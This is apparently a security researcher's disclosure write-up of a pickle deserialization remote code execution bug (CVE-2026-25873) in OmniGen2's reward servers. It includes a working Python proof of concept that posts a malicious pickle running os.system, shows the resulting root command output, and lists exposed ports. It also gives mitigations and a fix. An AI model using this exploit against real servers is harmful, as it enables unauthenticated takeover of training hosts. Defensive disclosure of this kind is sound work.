OmniGen2: Unauthenticated RCE via Pickle Deserialization in BAAI's Reward Server
Introduction
While doing a systematic audit of pickle deserialization patterns across popular ML/AI projects on GitHub, I found a critical vulnerability in OmniGen2, a multimodal AI project by BAAI (Beijing Academy of Artificial Intelligence) with 4,000+ stars.
The reward server component, used during reinforcement learning training, calls pickle.loads() directly on HTTP POST bodies without any authentication. Because the server binds to 0.0.0.0 by default, anyone who can reach its port gets unauthenticated Remote Code Execution.
Target: VectorSpaceLab/OmniGen2
Stars: 4,000+
CVE: CVE-2026-25873
Severity: Critical (CVSS 4.0: 9.3)
What is OmniGen2?
OmniGen2 is an open-source multimodal generation model developed by BAAI. It handles text-to-image generation, image editing, and visual understanding. The project includes an RL (Reinforcement Learning) training component called OmniGen2-RL, which uses a distributed reward server architecture to score generated outputs during training.
The reward server infrastructure consists of a proxy server (reward_proxy.py, port 23456) that distributes work to multiple backend workers (reward_server.py, ports 18888+). Both communicate via HTTP with pickle-serialized payloads.
The Vulnerability
The pattern is dead simple. In reward_proxy.py, line 208:
def prepare_request_data(request_body):
    data = pickle.loads(request_body)  # untrusted network input
This function is called from the Flask POST / endpoint at line 224:
@app.route("/", methods=["POST"])
def evaluate():
    ...
    data = prepare_request_data(request.data)
The same pattern exists in reward_server.py at line 118:
def parse_and_validate_request(raw_data):
    data = pickle.loads(raw_data)  # same thing
That’s it. Raw bytes from the network, straight into pickle.loads(). No authentication, no validation, no restricted unpickler. The server binds to 0.0.0.0 by default, making it accessible from any network interface.
Python’s pickle module executes arbitrary code during deserialization via the __reduce__ protocol - an attacker sends a crafted object, and pickle.loads() runs whatever function that object specifies before any other processing happens.
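To make the mechanism concrete, here is a harmless sketch of the __reduce__ behavior described above. The class name `Demo` and the choice of `int` as the callable are illustrative assumptions, not code from the OmniGen2 repository.

```python
import pickle


class Demo:
    """Hypothetical class used only to illustrate __reduce__."""

    def __reduce__(self):
        # Tell pickle: "to rebuild this object, call int('42')".
        # Any importable callable could be named here instead of int.
        return (int, ("42",))


payload = pickle.dumps(Demo())

# The named callable runs inside pickle.loads(), before the caller
# gets a chance to inspect or validate the result.
result = pickle.loads(payload)

print(type(result).__name__, result)  # int 42
```

Note that the payload references only the callable and its arguments, so the receiving process does not need the `Demo` class to exist. What comes back is the callable's return value, which is why any type check placed after pickle.loads() runs too late.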
Proof of Concept
Setting Up the Target
I tested this against the real reward_proxy.py code from the repository, deployed in Docker exactly as the project documents it:
# Docker with real reward_proxy.py and real editscore_7B.yml config
docker run -d --name omnigen2-lab -p 23456:23456 omnigen2-lab
The server starts with:
python reward_proxy.py --config_path server_configs/editscore_7B.yml
The Exploit
import pickle
import os
import requests

class RCE:
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))

requests.post('http://target:23456/', data=pickle.dumps(RCE('id > /tmp/pwned')))
Result
$ docker exec omnigen2-lab cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root) # <-- root!
The server returns HTTP 400 - that’s expected. The pickle.loads() call executes the malicious payload, then the server tries to access dict keys on the result (which is an int from os.system()), fails, and returns an error. But the RCE already happened before the validation.
Both the proxy server (port 23456) and the worker servers (ports 18888+) are vulnerable through the same pattern.
Attack Surface
The deployment architecture makes this particularly concerning:
- The proxy binds to 0.0.0.0:23456 by default
- Worker servers bind to 0.0.0.0:18888 (and sequential ports)
- The deployment scripts (start_multi_machines.sh) use SSH to start servers across multiple hosts, confirming these are meant to be network-accessible
- No firewall rules, TLS, or authentication tokens are referenced anywhere in the codebase
- These servers run on GPU nodes, so compromise gives access to expensive compute infrastructure
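One way to shrink this exposure is to default to the loopback interface and make wider binding an explicit choice. The sketch below assumes hypothetical `--host` and `--port` flags; whether the real servers accept such options is not something I am asserting here.

```python
import argparse


def build_parser():
    """Hypothetical CLI for a reward server; flag names are assumptions."""
    parser = argparse.ArgumentParser(description="reward server (sketch)")
    # Loopback by default: only processes on the same host can connect.
    parser.add_argument("--host", default="127.0.0.1",
                        help="interface to bind; set explicitly for multi-host runs")
    parser.add_argument("--port", type=int, default=23456)
    return parser


args = build_parser().parse_args([])
print(args.host, args.port)  # 127.0.0.1 23456
```

A multi-machine deployment would still need to bind to a reachable interface, so this only removes the accidental exposure. It does not replace authentication or a safe wire format.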
There’s also a client-side vector: reward_client_edit.py calls pickle.loads(response.content) on server responses, meaning a compromised server could RCE the training clients too.
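As noted earlier, neither side uses a restricted unpickler. Where pickle cannot be removed right away, a stopgap along the following lines might help. It follows the "restricting globals" pattern from the Python documentation; the names `DataOnlyUnpickler` and `data_only_loads` are hypothetical and do not come from the repository.

```python
import io
import pickle


class DataOnlyUnpickler(pickle.Unpickler):
    """Hypothetical unpickler that refuses every global lookup."""

    def find_class(self, module, name):
        # Plain dicts, lists, strings, and numbers never reach this method.
        # Anything that names a class or function does, and is rejected.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def data_only_loads(raw: bytes):
    """Deserialize bytes while allowing only built-in data containers."""
    return DataOnlyUnpickler(io.BytesIO(raw)).load()


print(data_only_loads(pickle.dumps({"score": 0.87})))  # {'score': 0.87}
```

This narrows what a hostile response can do, but it is defense in depth rather than a cure. Moving both directions of the protocol off pickle remains the cleaner option.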
Suggested Fix
The reward server serializes scores, image paths, and training configs - all representable as JSON. Replace pickle.loads() with json.loads() and add a shared secret in an Authorization header.
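A minimal sketch of that fix, using only the standard library, might look like this. The function names, the `Bearer` scheme, and the example field names are assumptions for illustration; the real request schema and the content of the fix PR are not reproduced here.

```python
import hmac
import json


def is_authorized(auth_header, secret):
    """Check the Authorization header against a shared secret."""
    if not secret:
        return False  # refuse to run with an empty secret
    expected = f"Bearer {secret}".encode()
    supplied = (auth_header or "").encode()
    # Constant-time comparison avoids leaking the secret through timing.
    return hmac.compare_digest(supplied, expected)


def parse_request(body, auth_header, secret):
    """Authenticate first, then decode the body as JSON instead of pickle."""
    if not is_authorized(auth_header, secret):
        raise PermissionError("missing or invalid Authorization header")
    data = json.loads(body)  # raises ValueError on anything that is not JSON
    if not isinstance(data, dict):
        raise ValueError("request body must be a JSON object")
    return data


secret = "example-secret"  # hypothetical; load from configuration in practice
body = json.dumps({"image_paths": ["a.png"], "config": "editscore_7B"}).encode()
print(parse_request(body, f"Bearer {secret}", secret))
```

In a Flask handler, `body` would correspond to request.data and `auth_header` to the incoming Authorization header. Because json.loads() only ever builds dicts, lists, strings, numbers, booleans, and None, a crafted body can no longer name a callable to execute.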
Timeline
- 2026-02-10: Vulnerability discovered and confirmed via Docker PoC
- 2026-02-10: Disclosure email sent to vendor (project leads via arxiv paper contacts)
- 2026-02-10: CVE request submitted to VulnCheck
- 2026-02-11: CVE-2026-25873 assigned by VulnCheck
- 2026-03-18: No response from maintainers. Fix PR submitted: #139
- 2026-03-18: CVE published, write-up disclosed
Takeaways
OmniGen2 is the most straightforward case in this series - HTTP POST body straight into pickle.loads(), running as root in Docker, on a multi-machine deployment with SSH-based orchestration. The client-side vector (deserializing server responses) adds a bidirectional risk: compromise the server, and you compromise every training client that connects to it.